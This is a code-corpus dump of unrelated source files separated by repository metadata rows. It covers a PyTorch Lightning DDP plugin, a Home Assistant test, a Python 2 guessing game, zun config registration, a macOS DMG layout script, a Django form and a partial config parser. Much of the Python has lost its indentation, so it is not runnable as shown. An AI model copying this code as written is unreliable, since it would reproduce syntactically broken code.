distributed_backend = "ddp"
def __init__(
self,
parallel_devices: Optional[List[torch.device]] = None,
num_nodes: Optional[int] = None,
cluster_environment: Optional[ClusterEnvironment] = None,
checkpoint_io: Optional[CheckpointIO] = None,
sync_batchnorm: Optional[bool] = None,
ddp_comm_state: Optional[object] = None,
ddp_comm_hook: Optional[callable] = None,
ddp_comm_wrapper: Optional[callable] = None,
model_averaging_period: Optional[int] = None,
**kwargs: Union[Any, Dict[str, Any]],
) -> None:
super().__init__(
parallel_devices=parallel_devices,
cluster_environment=cluster_environment,
checkpoint_io=checkpoint_io,
)
self.interactive_ddp_procs = []
if num_nodes is not None:
rank_zero_deprecation(
"Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4, and will be removed in v1.6."
" Notice that it will be overriden by the trainer setting."
)
self._num_nodes = num_nodes or 1
if sync_batchnorm is not None:
rank_zero_deprecation(
"Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4, and will be removed in v1.6."
" Notice that it will be overriden by the trainer setting."
)
self._sync_batchnorm = sync_batchnorm or False
self.dist = LightningDistributed()
self.num_processes = len(self.parallel_devices) if self.parallel_devices is not None else 0
self._ddp_kwargs = kwargs
self._task_idx = None
self._ddp_comm_state = ddp_comm_state
self._ddp_comm_hook = ddp_comm_hook
self._ddp_comm_wrapper = ddp_comm_wrapper
self._model_averaging_period = model_averaging_period
self._pids: Optional[List[int]] = None
self._sync_dir: Optional[str] = None
self.set_world_ranks()
@property
def is_distributed(self) -> bool:
return True
@property
def root_device(self) -> torch.device:
return self.parallel_devices[self.local_rank]
@property
def num_nodes(self) -> int:
return self._num_nodes
@num_nodes.setter
def num_nodes(self, num_nodes: int) -> None:
# note that world ranks is related to num_nodes, when resetting it, need to reset world ranks
self._num_nodes = num_nodes
self.set_world_ranks()
@property
def sync_batchnorm(self) -> bool:
return self._sync_batchnorm
@sync_batchnorm.setter
def sync_batchnorm(self, sync_batchnorm: bool) -> None:
self._sync_batchnorm = sync_batchnorm
@property
def task_idx(self) -> Optional[int]:
rank_zero_deprecation(
f"`{self.__class__.__name__}.task_idx` is deprecated in v1.4 and will be removed in v1.6. Use "
f"`{self.__class__.__name__}.local_rank` instead."
)
return self._task_idx
@task_idx.setter
def task_idx(self, task_idx: int) -> None:
self._task_idx = task_idx
@property
def distributed_sampler_kwargs(self):
distributed_sampler_kwargs = dict(num_replicas=(self.num_nodes * self.num_processes), rank=self.global_rank)
return distributed_sampler_kwargs
@property
def _is_single_process_single_device(self) -> bool:
return True
def setup_environment(self) -> None:
# start the other scripts
if not self.cluster_environment.creates_children():
self._call_children_scripts()
# set the task idx
self.task_idx = self.cluster_environment.local_rank()
self.setup_distributed()
def _call_children_scripts(self):
# bookkeeping of spawned processes
self._check_can_spawn_children()
# DDP Environment variables
os.environ["MASTER_ADDR"] = self.cluster_environment.master_address()
os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port())
# allow the user to pass the node rank
os.environ["NODE_RANK"] = str(self.cluster_environment.node_rank())
os.environ["LOCAL_RANK"] = str(self.cluster_environment.local_rank())
# Check if the current calling command looked like `python a/b/c.py` or `python -m a.b.c`
# See https://docs.python.org/3/reference/import.html#main-spec
if __main__.__spec__ is None: # pragma: no-cover
# Script called as `python a/b/c.py`
# when user is using hydra find the absolute path
path_lib = os.path.abspath if not _HYDRA_AVAILABLE else to_absolute_path
# pull out the commands used to run the script and resolve the abs file path
command = sys.argv
try:
full_path = path_lib(command[0])
except Exception:
full_path = os.path.abspath(command[0])
command[0] = full_path
# use the same python interpreter and actually running
command = [sys.executable] + command
else: # Script called as `python -m a.b.c`
command = [sys.executable, "-m", __main__.__spec__.name] + sys.argv[1:]
# the visible devices tell us how many GPUs we want to use.
# when the trainer script was called the device has already been scoped by the time
# code reaches this point. so, to call the scripts, we need to leave cuda visible devices alone
# but forward the GPUs selected via environment variables
if self.parallel_devices is None:
raise MisconfigurationException("you selected (distribute_backend = ddp) but did not set Trainer(gpus=?)")
os.environ["WORLD_SIZE"] = f"{self.num_processes * self.num_nodes}"
self.interactive_ddp_procs = []
for local_rank in range(1, self.num_processes):
env_copy = os.environ.copy()
env_copy["LOCAL_RANK"] = f"{local_rank}"
# remove env var if global seed not set
if os.environ.get("PL_GLOBAL_SEED") is None and "PL_GLOBAL_SEED" in env_copy:
del env_copy["PL_GLOBAL_SEED"]
# start process
# if hydra is available and initialized, make sure to set the cwd correctly
cwd: Optional[str] = None
if _HYDRA_AVAILABLE:
if HydraConfig.initialized():
cwd = get_original_cwd()
os_cwd = f'"{os.getcwd()}"'
command += [f"hydra.run.dir={os_cwd}", f"hydra.job.name=train_ddp_process_{local_rank}"]
proc = subprocess.Popen(command, env=env_copy, cwd=cwd)
self.interactive_ddp_procs.append(proc)
            # starting all processes at once can cause issues with dataloaders;
            # stagger the launches with a short random delay (a few seconds)
delay = np.random.uniform(1, 5, 1)[0]
sleep(delay)
def setup_distributed(self):
reset_seed()
# determine which process we are and world size
self.set_world_ranks()
# set warning rank
rank_zero_only.rank = self.global_rank
# set up server using proc 0's ip address
# try to init for 20 times at max in case ports are taken
# where to store ip_table
init_ddp_connection(self.cluster_environment, self.torch_distributed_backend)
# set the ranks and devices
self.dist.rank = self.global_rank
self.dist.device = self.root_device
def _check_can_spawn_children(self):
if self.local_rank != 0:
raise RuntimeError(
"Lightning attempted to launch new distributed processes with `local_rank > 0`. This should not happen."
" Possible reasons: 1) LOCAL_RANK environment variable was incorrectly modified by the user,"
" 2) `ClusterEnvironment.creates_children()` incorrectly implemented."
)
def set_world_ranks(self) -> None:
if self.cluster_environment is None:
return
self.cluster_environment.set_global_rank(self.node_rank * self.num_processes + self.local_rank)
self.cluster_environment.set_world_size(self.num_nodes * self.num_processes)
rank_zero_only.rank = self.cluster_environment.global_rank()
def pre_configure_ddp(self):
        # if unset, default `find_unused_parameters` to `True`
# Many models require setting this parameter to True, as there are corner cases
# when not all parameter backward hooks are fired by the autograd engine even if require_grad is set to True.
# This flag does come with a performance hit, so it is suggested to disable in cases where it is possible.
self._ddp_kwargs["find_unused_parameters"] = self._ddp_kwargs.get("find_unused_parameters", True)
# todo: PyTorch 1.7.0 DDP introduces `self.reducer._rebuild_buckets()` breaking manual_optimization
if (
_TORCH_GREATER_EQUAL_1_7
and not self.lightning_module.automatic_optimization
and not self._ddp_kwargs.get("find_unused_parameters", False)
):
rank_zero_warn(
"From PyTorch 1.7.0, Lightning ``manual_optimization`` needs to set ``find_unused_parameters=True`` "
"to properly work with DDP."
)
self._ddp_kwargs["find_unused_parameters"] = True
def _register_ddp_hooks(self) -> None:
# In 1.8, DDP communication hooks only work with NCCL backend and SPSD (single process single device) mode
# Since 1.9, DDP communication hooks can work on all backends.
if _TORCH_GREATER_EQUAL_1_9 or (
_TORCH_GREATER_EQUAL_1_8 and self.on_gpu and self._is_single_process_single_device
):
register_ddp_comm_hook(
model=self._model,
ddp_comm_state=self._ddp_comm_state,
ddp_comm_hook=self._ddp_comm_hook,
ddp_comm_wrapper=self._ddp_comm_wrapper,
)
if (
_TORCH_GREATER_EQUAL_1_10
and isinstance(self._ddp_comm_state, post_localSGD.PostLocalSGDState)
and self.lightning_module.trainer.state.fn == TrainerFn.FITTING
):
self._reinit_optimizers_with_post_localSGD(self._ddp_comm_state.start_localSGD_iter)
def _reinit_optimizers_with_post_localSGD(self, warmup_steps: int):
optimizers = self.lightning_module.trainer.optimizers
if self._model_averaging_period is None:
raise ValueError(
"Post-localSGD algorithm is used, but model averaging period is not provided to DDP plugin."
)
averager = averagers.PeriodicModelAverager(period=self._model_averaging_period, warmup_steps=warmup_steps)
for x, optimizer in enumerate(optimizers):
if isinstance(optimizer, LightningOptimizer):
optimizer = optimizer._optimizer
if (
isinstance(optimizer, DistributedOptimizer)
or isinstance(optimizer, ZeroRedundancyOptimizer)
or (_FAIRSCALE_AVAILABLE and isinstance(optimizer, OSS))
):
raise ValueError(
f"Cannot wrap a distributed optimizer of type {optimizer.__name__} by PostLocalSGDOptimizer."
)
if isinstance(optimizer, PostLocalSGDOptimizer):
continue
optim_class = type(optimizer)
post_localSGD_optimizer = PostLocalSGDOptimizer(
params=optimizer.param_groups,
optimizer_class=optim_class,
averager=averager,
**optimizer.defaults,
)
optimizers[x] = post_localSGD_optimizer
del optimizer
trainer = self.lightning_module.trainer
trainer.optimizers = optimizers
trainer.convert_to_lightning_optimizers()
def configure_ddp(self) -> None:
self.pre_configure_ddp()
self._model = DistributedDataParallel(
LightningDistributedModule(self.model), device_ids=self.determine_ddp_device_ids(), **self._ddp_kwargs
)
self._register_ddp_hooks()
def determine_ddp_device_ids(self):
if self.root_device.type == "cpu":
return None
return [self.root_device.index]
def pre_dispatch(self):
# share ddp pids to all processes
self._share_information_to_prevent_deadlock()
# move the model to the correct device
self.model_to_device()
if self.sync_batchnorm:
self.model = self.configure_sync_batchnorm(self.model)
# skip wrapping the model if we are not fitting as no gradients need to be exchanged
trainer_fn = self.lightning_module.trainer.state.fn
if trainer_fn == TrainerFn.FITTING:
self.configure_ddp()
def post_dispatch(self, trainer: "pl.Trainer") -> None:
self.cluster_environment.teardown()
def barrier(self, *args, **kwargs) -> None:
if not distributed_available():
return
if _TORCH_GREATER_EQUAL_1_8 and torch.distributed.get_backend() == "nccl":
torch.distributed.barrier(device_ids=self.determine_ddp_device_ids())
else:
torch.distributed.barrier()
def broadcast(self, obj: object, src: int = 0) -> object:
return self.dist.broadcast(obj)
def pre_backward(self, closure_loss: torch.Tensor) -> None:
"""Run before precision plugin executes backward."""
if not self.lightning_module.automatic_optimization:
prepare_for_backward(self.model, closure_loss)
def model_to_device(self):
self.model.to(self.root_device)
def reduce(self, tensor, group: Optional[Any] = None, reduce_op: Union[ReduceOp, str] = "mean") -> torch.Tensor:
"""Reduces a tensor from several distributed processes to one aggregated tensor.
Args:
tensor: the tensor to sync and reduce
group: the process group to gather results from. Defaults to all processes (world)
reduce_op: the reduction operation. Defaults to 'mean'/'avg'.
Can also be a string 'sum' to calculate the sum during reduction.
Return:
            reduced value, except when the input was not a tensor, in which case the output remains unchanged
"""
if isinstance(tensor, torch.Tensor):
tensor = sync_ddp_if_available(tensor, group, reduce_op=reduce_op)
return tensor
def training_step(self, *args, **kwargs) -> Optional[Any]:
return self.model(*args, **kwargs)
def validation_step(self, *args, **kwargs) -> Optional[STEP_OUTPUT]:
if isinstance(self.model, DistributedDataParallel):
# used when calling `trainer.fit`
return self.model(*args, **kwargs)
else:
# used when calling `trainer.validate`
return self.lightning_module.validation_step(*args, **kwargs)
def test_step(self, *args, **kwargs) -> Optional[STEP_OUTPUT]:
return self.lightning_module.test_step(*args, **kwargs)
def predict_step(self, *args, **kwargs) -> Any:
return self.lightning_module.predict_step(*args, **kwargs)
def post_training_step(self):
if not self.lightning_module.automatic_optimization:
self.model.require_backward_grad_sync = True
@classmethod
def register_plugins(cls, plugin_registry: Dict) -> None:
plugin_registry.register(
"ddp_find_unused_parameters_false",
cls,
description="DDP Plugin with `find_unused_parameters` as False",
find_unused_parameters=False,
)
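    # The registered alias above can then be selected by name instead of
    # constructing the plugin manually. Hedged sketch (whether the name is passed
    # via `plugins` or `strategy` depends on the Lightning version in use):
    #
    #   Trainer(gpus=2, plugins="ddp_find_unused_parameters_false")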
def _share_information_to_prevent_deadlock(self):
self._share_pids()
        # there should be a unique sync_dir per node.
if self.local_rank == 0:
# create a temporary directory used to synchronize processes on deadlock.
self._sync_dir = tempfile.mkdtemp()
sync_dirs = []
global_node_rank_zero = 0
for _ in range(self.num_nodes):
sync_dirs.append(self.broadcast(self._sync_dir, global_node_rank_zero))
global_node_rank_zero += self.world_size // self.num_nodes
self._sync_dir = sync_dirs[self.node_rank]
def _share_pids(self):
"""Make all DDP processes aware of all processes pids."""
self.barrier()
pids = self.all_gather(torch.tensor(os.getpid(), device=self.root_device))
pids = pids.cpu().numpy().tolist()
self._pids = pids if isinstance(pids, list) else [pids]
def reconciliate_processes(self, trace: str):
if self.world_size < 2:
return
sync_dir = self._sync_dir
if not sync_dir:
rank_zero_warn("Error handling mechanism for deadlock detection is uninitialized. Skipping check.")
return
# The cluster may be configured to periodically purge the `/tmp`
# directory, in which case `sync_dir` may not exist anymore at this
# point. Idempotently create it to ensure its existence.
Path(sync_dir).mkdir(parents=True, exist_ok=True)
# save a file locally.
torch.save(True, os.path.join(sync_dir, f"{self.global_rank}.pl"))
# sleep for a short time
time.sleep(3)
# return if all processes wrote a file in the `sync_dir`.
# todo (tchaton) Add support for non-shared file-system which will fail.
if len(os.listdir(sync_dir)) == (self.world_size // self.num_nodes):
return
for pid in self._pids:
if pid != os.getpid():
os.kill(pid, signal.SIGKILL)
shutil.rmtree(sync_dir)
raise DeadlockDetectedException(f"DeadLock detected from rank: {self.global_rank} \n {trace}")
def teardown(self) -> None:
if isinstance(self.model, DistributedDataParallel):
self.model = self.lightning_module
if self.on_gpu:
# GPU teardown
self.lightning_module.cpu()
# clean up memory
torch.cuda.empty_cache()
| 41.097889
| 120
| 0.671726
|
c7b3dbc84279231bb9c8dd66ab4e26633c400572
| 1,116
|
py
|
Python
|
tests/components/myq/test_light.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 22,481
|
2020-03-02T13:09:59.000Z
|
2022-03-31T23:34:28.000Z
|
tests/components/myq/test_light.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 31,101
|
2020-03-02T13:00:16.000Z
|
2022-03-31T23:57:36.000Z
|
tests/components/myq/test_light.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 11,411
|
2020-03-02T14:19:20.000Z
|
2022-03-31T22:46:07.000Z
|
"""The scene tests for the myq platform."""
from homeassistant.const import STATE_OFF, STATE_ON
from .util import async_init_integration
async def test_create_lights(hass):
"""Test creation of lights."""
await async_init_integration(hass)
state = hass.states.get("light.garage_door_light_off")
assert state.state == STATE_OFF
expected_attributes = {
"friendly_name": "Garage Door Light Off",
"supported_features": 0,
}
# Only test for a subset of attributes in case
# HA changes the implementation and a new one appears
assert all(
state.attributes[key] == expected_attributes[key] for key in expected_attributes
)
state = hass.states.get("light.garage_door_light_on")
assert state.state == STATE_ON
expected_attributes = {
"friendly_name": "Garage Door Light On",
"supported_features": 0,
}
# Only test for a subset of attributes in case
# HA changes the implementation and a new one appears
assert all(
state.attributes[key] == expected_attributes[key] for key in expected_attributes
)
| 30.162162
| 88
| 0.694444
|
c9c4d292d0f00f4468fe62f0502c48da5e0a1711
| 964
|
py
|
Python
|
samples/py.py
|
mliscourtney/vim256colorschemes
|
17c060fec90fb0afd3b638776277e88935e2f21f
|
[
"MIT"
] | 1
|
2015-12-29T19:56:18.000Z
|
2015-12-29T19:56:18.000Z
|
samples/py.py
|
mliscourtney/vim256colorschemes
|
17c060fec90fb0afd3b638776277e88935e2f21f
|
[
"MIT"
] | null | null | null |
samples/py.py
|
mliscourtney/vim256colorschemes
|
17c060fec90fb0afd3b638776277e88935e2f21f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import random
random.seed()
mugwump_x = random.randrange(10)
mugwump_y = random.randrange(10)
units_from_mugwump = 1
turn_number = 0
while units_from_mugwump and turn_number < 10:
guess = map(int, raw_input("What is your guess (x y)? ").split())
if not all(0 <= values < 10 for values in guess):
print "Please enter numbers in the range 0 and", 10 - 1
continue
if len(guess) != 2:
print "Please only enter two numbers"
continue
else:
guess_x = guess[0]
guess_y = guess[1]
units_from_mugwump = abs(guess_x - mugwump_x) + abs(guess_y - mugwump_y)
print "You are", units_from_mugwump, "units from the Mugwump."
turn_number += 1
print "Turn number", turn_number
if units_from_mugwump == 0:
print "You win! The Mugwump is at (", mugwump_x, ",", mugwump_y, ")."
else:
print "You lose. The Mugwump is at (", mugwump_x, ",", mugwump_y, ")."
| 32.133333
| 80
| 0.637967
|
93cba62fc9a46bb5cb5c1354c9d545719b7e3849
| 2,091
|
py
|
Python
|
zun-3.0.0/zun/conf/__init__.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | null | null | null |
zun-3.0.0/zun/conf/__init__.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
zun-3.0.0/zun/conf/__init__.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from zun.conf import api
from zun.conf import availability_zone
from zun.conf import cinder_client
from zun.conf import compute
from zun.conf import container_driver
from zun.conf import database
from zun.conf import docker
from zun.conf import glance_client
from zun.conf import image_driver
from zun.conf import keystone
from zun.conf import netconf
from zun.conf import network
from zun.conf import neutron_client
from zun.conf import path
from zun.conf import pci
from zun.conf import profiler
from zun.conf import quota
from zun.conf import scheduler
from zun.conf import services
from zun.conf import ssl
from zun.conf import utils
from zun.conf import volume
from zun.conf import websocket_proxy
from zun.conf import zun_client
CONF = cfg.CONF
api.register_opts(CONF)
compute.register_opts(CONF)
container_driver.register_opts(CONF)
database.register_opts(CONF)
docker.register_opts(CONF)
glance_client.register_opts(CONF)
image_driver.register_opts(CONF)
keystone.register_opts(CONF)
path.register_opts(CONF)
scheduler.register_opts(CONF)
services.register_opts(CONF)
zun_client.register_opts(CONF)
ssl.register_opts(CONF)
profiler.register_opts(CONF)
neutron_client.register_opts(CONF)
network.register_opts(CONF)
websocket_proxy.register_opts(CONF)
pci.register_opts(CONF)
quota.register_opts(CONF)
volume.register_opts(CONF)
cinder_client.register_opts(CONF)
netconf.register_opts(CONF)
availability_zone.register_opts(CONF)
utils.register_opts(CONF)
| 30.75
| 78
| 0.812052
|
ff920e6b3abe5f46a8ead655592fc7794e61c8d1
| 3,717
|
py
|
Python
|
contrib/macdeploy/custom_dsstore.py
|
Apiocoin/litecoin
|
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
|
[
"MIT"
] | 3
|
2021-06-08T00:07:01.000Z
|
2021-06-09T17:53:44.000Z
|
contrib/macdeploy/custom_dsstore.py
|
Apiocoin/litecoin
|
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
|
[
"MIT"
] | null | null | null |
contrib/macdeploy/custom_dsstore.py
|
Apiocoin/litecoin
|
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00apiocoinuser:\x00Documents:\x00apiocoin:\x00apiocoin:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/apiocoinuser/Documents/apiocoin/apiocoin/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['Apiocoin-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 61.95
| 1,817
| 0.724778
|
ae11f429e05e898ed4f2102e3645a2ef36a1d317
| 655
|
py
|
Python
|
viewer/forms.py
|
reskyner/fragalysis-backend
|
6b83e801b86f8b39ed02d6a8cae466790c2bd486
|
[
"Apache-2.0"
] | null | null | null |
viewer/forms.py
|
reskyner/fragalysis-backend
|
6b83e801b86f8b39ed02d6a8cae466790c2bd486
|
[
"Apache-2.0"
] | null | null | null |
viewer/forms.py
|
reskyner/fragalysis-backend
|
6b83e801b86f8b39ed02d6a8cae466790c2bd486
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
import zipfile
from cStringIO import StringIO
CHOICES = [
(0, 'validate'),
(1, 'upload'),
]
class CSetForm(forms.Form):
target_name = forms.CharField(label='Target', max_length=100)
sdf_file = forms.FileField(label='All compounds sdf (.sdf)')
pdb_zip = forms.FileField(required=False, label='PDB files (.zip)')
submit_choice = forms.CharField(widget=forms.RadioSelect(choices=CHOICES))
upload_key = forms.CharField(label='Upload Key')
class UploadKeyForm(forms.Form):
contact_email = forms.EmailField(widget=forms.TextInput(attrs={'class':'form-control', 'autocomplete':'off'}), required=True)
| 32.75
| 129
| 0.723664
|
a5630ed7c0808b97cbd43c8cc31c9f3098aafb2a
| 11,342
|
py
|
Python
|
src/config/options.py
|
spunkmars/django-spms
|
95ac193891f93da07c3a26feeaf846e6030f3466
|
[
"BSD-3-Clause"
] | 23
|
2020-04-14T07:50:38.000Z
|
2022-01-27T09:07:19.000Z
|
src/config/options.py
|
bjzhangyong/django-spms
|
95ac193891f93da07c3a26feeaf846e6030f3466
|
[
"BSD-3-Clause"
] | 8
|
2021-03-19T09:01:16.000Z
|
2022-02-10T12:28:55.000Z
|
src/config/options.py
|
bjzhangyong/django-spms
|
95ac193891f93da07c3a26feeaf846e6030f3466
|
[
"BSD-3-Clause"
] | 6
|
2020-04-14T13:34:29.000Z
|
2022-01-25T04:05:16.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
if sys.version_info >= (3, 6, 0):
import configparser as ConfigParser
else:
import ConfigParser
from django.utils.translation import ugettext_lazy
from django.utils.translation import ugettext
from spmo.common import Common
def get_conf_obj(config_file=None):
config = ConfigParser.ConfigParser()
config.read(config_file)
return config
def get_conf_to_dict(config_file=None):
c_dict = {}
config = get_conf_obj(config_file=config_file)
sections = config.sections()
for sect in sections:
c_dict[sect] = config.items(sect)
return c_dict
def get_option_val(conf_obj=None, section=None, c_k={}):
if conf_obj.has_option(section, c_k['name']):
if c_k['type'] == 'boolean':
return conf_obj.getboolean(section, c_k['name'])
elif c_k['type'] == 'int':
return conf_obj.getint(section, c_k['name'])
elif c_k['type'] == 'float':
return conf_obj.getfloat(section, c_k['name'])
elif c_k['type'] == 'list':
cl = []
cl_str = conf_obj.get(section, c_k['name'])
cl = cl_str.split(',')
cl = [l.strip() for l in cl]
return cl
elif c_k['type'] == 'text':
return conf_obj.get(section, c_k['name'])
else:
return conf_obj.get(section, c_k['name'])
elif 'has_default' in c_k and c_k['has_default'] is True and 'default' in c_k:
return c_k['default']
else:
        raise Exception('Cannot find option, and no default is set!')
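# Illustrative usage sketch for get_option_val (the section/option names and the
# sample INI content below are hypothetical, not shipped with this project):
#
#   [common]
#   debug = true
#   cors_origin_whitelist = a.example.com, b.example.com
#
#   conf = get_conf_obj(config_file='settings.ini')
#   get_option_val(conf, 'common', c_k={'name': 'debug', 'type': 'boolean',
#                                       'require': False, 'has_default': True,
#                                       'default': False})
#   # -> True (via ConfigParser.getboolean)
#   get_option_val(conf, 'common', c_k={'name': 'cors_origin_whitelist', 'type': 'list',
#                                       'require': False, 'has_default': True, 'default': []})
#   # -> ['a.example.com', 'b.example.com']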
def get_section_val(conf_obj=None, section=None, c_ks={}):
c_args = {}
if not conf_obj.has_section(section):
        raise Exception('Cannot find section: [%s]!' % section)
for k in c_ks:
if k['require'] is True:
if not conf_obj.has_option(section, k['name']):
                raise Exception('Cannot find section: [%s], option: [%s]!' % (section, k['name']))
c_args[k['name']] = get_option_val(conf_obj=conf_obj, section=section, c_k=k)
return c_args
def get_common_conf(config_file=None):
config = get_conf_obj(config_file=config_file)
sections = {}
c_args = {}
c_keys = {
'common':
[
{'name': 'site_name', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'site_desc', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'site_version', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'site_copyright_year', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'secret_key', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'debug', 'type': 'boolean', 'default': False, 'require': False,
'has_default': True},
{'name': 'time_zone', 'type': 'text', 'default': 'Asia/Shanghai', 'require': False,
'has_default': True},
{'name': 'language_code', 'type': 'text', 'default': 'en-us', 'require': False,
'has_default': True},
],
'cors':
[
{'name': 'cors_allow_credentials', 'type': 'boolean', 'default': True, 'require': False,
'has_default': True},
{'name': 'cors_origin_allow_all', 'type': 'boolean', 'default': True, 'require': False,
'has_default': True},
{'name': 'cors_origin_whitelist', 'type': 'list', 'default': [], 'require': False,
'has_default': True},
]
}
sections['common'] = get_section_val(conf_obj=config, section='common', c_ks=c_keys['common'])
sections['cors'] = get_section_val(conf_obj=config, section='cors', c_ks=c_keys['cors'])
c_args = sections
return c_args
def get_db_conf(config_file=None):
config = get_conf_obj(config_file=config_file)
sections = {}
c_args = {}
c_keys = {
'common':
[
{'name': 'db_type', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
],
'sqlite':
[
{'name': 'db_name', 'type': 'text', 'default': None, 'require': True,
'has_default': False}, ],
'mysql':
[
{'name': 'host', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'port', 'type': 'int', 'default': None, 'require': True,
'has_default': False},
{'name': 'user', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'passwd', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
{'name': 'db', 'type': 'text', 'default': None, 'require': True,
'has_default': False},
],
'redis':
[
{'name': 'type', 'type': 'text', 'default': None, 'require': True,
